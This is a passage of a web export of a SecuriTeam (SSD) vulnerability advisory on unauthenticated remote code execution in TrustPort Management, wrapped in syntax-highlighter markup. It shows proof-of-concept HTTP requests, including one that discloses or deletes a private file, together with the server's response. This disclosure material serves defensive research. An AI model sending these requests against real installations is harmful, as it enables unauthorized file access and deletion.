class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;action&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-22\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-23\"><span class=\"crayon-v\">upload<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-24\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-v\">WebKitFormBoundary6rzvt7fRozJ1TlNT<\/span><span class=\"crayon-o\">&#8212;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0029 seconds] -->  <\/p>\n<p>Then to disclose\/delete the contents of C:private.txt:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ae0fedea1cc9762278283\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/get\/manage-get-stations-add.php?action=download&amp;key=restore_bkp_ HTTP\/1.1  Host: VULNERABLE_HOST:20394  Connection: close  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8  Upgrade-Insecure-Requests: 1  User-Agent: Mozilla  Accept-Encoding: gzip, deflate  Accept-Language: en-US,en;q=0.8<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc9762278283-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc9762278283-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc9762278283-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc9762278283-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc9762278283-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc9762278283-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc9762278283-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc9762278283-8\">8<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc9762278283-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">get<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">manage<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">get<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">stations<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">add<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">download<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">key<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">restore_bkp_ <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc9762278283-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">VULNERABLE_HOST<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">20394<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc9762278283-3\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc9762278283-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">image<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">webp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc9762278283-5\"><span class=\"crayon-v\">Upgrade<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Insecure<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Requests<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc9762278283-6\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Mozilla<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc9762278283-7\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc9762278283-8\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0015 seconds] -->  <\/p>\n<p>And response:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ae0fedea1ccb041849153\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> HTTP\/1.1 200 OK   Date: Sun, 04 Mar 2018 18:02:26 GMT  Set-Cookie: GUISESSID=cc025911b45268643cbeb8e87aa30cc3; path=\/  Pragma:  Expires: Mon, 26 Jul 1997 05:00:00 GMT  Last-Modified: Sun, 04 Mar 2018 18:02:26 GMT  Cache-Control: post-check=0, pre-check=0, false  Content-type: application\/download  Content-Disposition: attachment; filename=&#8221;export.csv&#8221;  Content-transfer-encoding: binary  Content-Length: 21    This is private data.<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1ccb041849153-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1ccb041849153-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1ccb041849153-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1ccb041849153-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1ccb041849153-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1ccb041849153-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1ccb041849153-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1ccb041849153-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1ccb041849153-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1ccb041849153-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1ccb041849153-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1ccb041849153-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1ccb041849153-13\">13<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1ccb041849153-1\"><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">OK <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1ccb041849153-2\"><span class=\"crayon-v\">Date<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Sun<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">04<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Mar<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2018<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">18<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">02<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">26<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1ccb041849153-3\"><span class=\"crayon-v\">Set<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GUISESSID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">cc025911b45268643cbeb8e87aa30cc3<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">path<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1ccb041849153-4\"><span class=\"crayon-v\">Pragma<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1ccb041849153-5\"><span class=\"crayon-v\">Expires<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mon<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">26<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Jul<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1997<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">05<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1ccb041849153-6\"><span class=\"crayon-v\">Last<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Modified<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Sun<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">04<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Mar<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2018<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">18<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">02<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">26<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1ccb041849153-7\"><span class=\"crayon-v\">Cache<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Control<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">post<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">check<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">check<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">false<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1ccb041849153-8\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">download<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1ccb041849153-9\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">attachment<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;export.csv&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1ccb041849153-10\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">transfer<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">binary<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1ccb041849153-11\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">21<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1ccb041849153-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1ccb041849153-13\"><span class=\"crayon-r\">This<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">private<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0020 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3685\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Wed, 25 Apr 2018 08:36:14 +0000<\/strong><\/p>\n<p>Vulnerability Summary Multiple vulnerabilities in TrustPort&#8217;s management product allow remote unauthenticated attackers to cause the product to execute arbitrary code. TrustPort Management &#8220;offers you an effective and practical way to install centrally, configure and update antivirus software in your network and it enables mass administration of TrustPort products. Central administration from TrustPort brings you simple &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3685\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory &#8211; TrustPort Management Unauthenticated Remote Code Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11682,10757,12136],"class_list":["post-12134","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-code-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/12134","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=12134"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/12134\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=12134"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=12134"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=12134"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}